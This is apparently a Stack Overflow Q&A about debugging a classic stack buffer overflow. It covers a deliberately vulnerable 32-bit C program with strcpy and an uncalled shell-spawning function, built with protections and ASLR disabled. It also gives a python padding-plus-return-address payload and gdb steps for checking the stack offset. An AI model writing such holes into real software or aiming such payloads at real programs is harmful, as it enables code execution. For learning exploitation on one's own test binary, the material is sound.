# Why does an input, which causes a buffer overflow for the given program give a segmentation fault?

Tags: c

I want to run the following program called `test.c` under *Ubuntu 18.04.3 LTS bionic*:

```
#include <stdio.h>
#include <string.h>

void not_called() {
    printf("Enjoy your shell!\n");
    system("/bin/bash");
}

void vulnerable_function(char* string) {
    char buffer[100];
    strcpy(buffer, string);
}

int main(int argc, char** argv) {
    vulnerable_function(argv[1]);
    return 0;
}
```

I compiled using `gcc -m32 -fno-stack-protector -no-pie test.c -o test` and deactivated already **ASLR** by replacing the 2 in `/proc/sys/kernel/randomize_va_space` with a 0. So protection mechanisms shouldn't be an issue.

I used **gdb** to have a look at the stack before `strcpy` gets called and to retrieve the adress of the `not_called` function.

Here are the results:

```
Dump of assembler code for function vulnerable_function:
   0x080484c2 <+0>: push   %ebp
   0x080484c3 <+1>: mov    %esp,%ebp
   0x080484c5 <+3>: push   %ebx
   0x080484c6 <+4>: sub    $0x74,%esp
   0x080484c9 <+7>: call   0x804852b <__x86.get_pc_thunk.ax>
   0x080484ce <+12>:    add    $0x1b32,%eax
   0x080484d3 <+17>:    sub    $0x8,%esp
   0x080484d6 <+20>:    pushl  0x8(%ebp)
   0x080484d9 <+23>:    lea    -0x6c(%ebp),%edx
   0x080484dc <+26>:    push   %edx
   0x080484dd <+27>:    mov    %eax,%ebx
   0x080484df <+29>:    call   0x8048320 <strcpy@plt>
   0x080484e4 <+34>:    add    $0x10,%esp
   0x080484e7 <+37>:    nop
   0x080484e8 <+38>:    mov    -0x4(%ebp),%ebx
   0x080484eb <+41>:    leave  
   0x080484ec <+42>:    ret    
End of assembler dump.

$1 = {<text variable, no debug info>} 0x8048486 <not_called>
```

I tried to go on using:

```
.\test "$(python -c 'print ("A"*0x6c + "BBBB" + "\x86\x84\x04\x08")')"
```

but I just get *Segmentation fault (core dumped)* as an error.
I tried to rebuild the example from [here](http://codearcana.com/posts/2013/05/28/introduction-to-return-oriented-programming-rop.html#fn-2). Is it maybe somehow related to those three additional push operations and the call to this mysterious x86pcthunk function in my *disas* of `vulnerable_function`?

Comment: Start by digging deeper.  Use your debugger to see on which instruction the segfault occurs.  Look at the contents of the stack at that point, and see if they are what you expect; if not, try to figure out why not.

Comment: The address 0x8048486 is not aligned to a 4 byte boundary. Not sure if this is required, but you could try using 0x8048484 instead

Comment: @SamuelPeter doesn't mean anything really. It doesn't have to be aligned.

Comment: Incidentally, I can't reproduce your problem - when I compile and run your code the same way, it successfully starts a shell.  This is on Ubuntu 19.04 but the compiled code of `vulnerable_function` appears to be just the same for me as for you (except that a different value is subtracted from the return value of `__x86.get_pc_thunk.ax`).

Comment: Besides seeing where the segfault happens, it may also be instructive to break after the return from `strcpy` and single-step the program from that point onward.

Answer (score 1, accepted):

You're most probably getting a segmentation fault because you're overwriting the return address with the wrong value. You can easily check what is going on by placing a breakpoint right at the `ret` instruction, and see the state of the stack at that point.

Start the program inside the debugger and place a breakpoint where needed:

```
$ gdb ./test

(gdb) break main
(gdb) run "$(python -c 'print ("A"*0x6c + "BBBB" + "\x86\x84\x04\x08")')"
```

When the breakpoint at `main` is reached, add a second breakpoint on the `ret` instruction of the vulnerable function:

```
(gdb) break *0x080484ec
(gdb) continue
```

Then, when the second breakpoint is reached, look what's on the stack now at the position pointed by `$esp`:

```
(gdb) x/wx $esp
```

What you would like to see is something like this:

```
0x7fffe830: 0x08048486
```

If you don't see that, it means your payload is wrong, and perhaps you wrongly calculated the needed offset. Take a look at what's in the stack before the saved return address:

```
(gdb) x/17wx $esp - 0x40
```

Again, what you would like to see is the following (assuming `$esp = 0x7fffe830`):

```
0x7fffe7f0: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffe800: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffe810: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffe820: 0x41414141  0x41414141  0x41414141  0x42424242
0x7fffe830: 0x08048486
```

The `0x41414141` values are your `AAAAAA...` padding, followed by four Bs (`0x42424242`) and the overridden return address `0x08048486`. If you see anything different, you can see if there is the need for more (or less) padding.

If the above did not help, check where the segmentation fault occurs, again using `gdb`. Since `gdb` automatically stops for you when a segfault happens, you would just have to run the program once and see where it crashes:

```
$ gdb ./test

(gdb) run "$(python -c 'print ("A"*0x6c + "BBBB" + "\x86\x84\x04\x08")')"

# ...

Program received signal SIGSEGV (fault address 0x0)
```

See what's going on and where the program died:

```
(gdb) backtrace
...
```

Comment: In the first code section you missed a parenthesis at the python statement. Thanks for that detailed description. However, some things occur, which I still don't understand. Even if I recompiled, the call to `__x86.get_pc_thunk.ax` didn't disappear. If i omit the `-m32` flag however, it is gone. Maybe you need to disable ASLR for 32-bit compiling somewhere else, but I couldn't find anything useful related to this issue online. Now, when I try your "instructions", I always get "Cannot access memory at address 0xfoo1" when I try to examine `esp` or `esp - 0xfoo2`.

Comment: When I try to backtrace, it becomes somehow evident, that this Python statement actually does its job but not quite as I wanted. The segmentation fault appears, because it tries to access `0x80484c286ca` and not `0x8048486`. So somehow, the compiler inserts for whatever reason `c2` and `ca` in this address. Is this a mistake in my python statement or is it maybe another protection mechanism?

Comment: @Lavair Of course you will get "cannot access memory ..." if you try to do `x/w $esp` in 64-bit mode. That is not gonna work, in 64-bit mode the stack pointer is `$rsp`, not `$esp`.

Comment: @Lavair I don't know what else to tell you. Instead of using python, just try manually entering a string yourself: `run AAAAA...` and see if the program crashes trying to jump to `0x41414141`. I just tested it on my machine, and it all works correctly.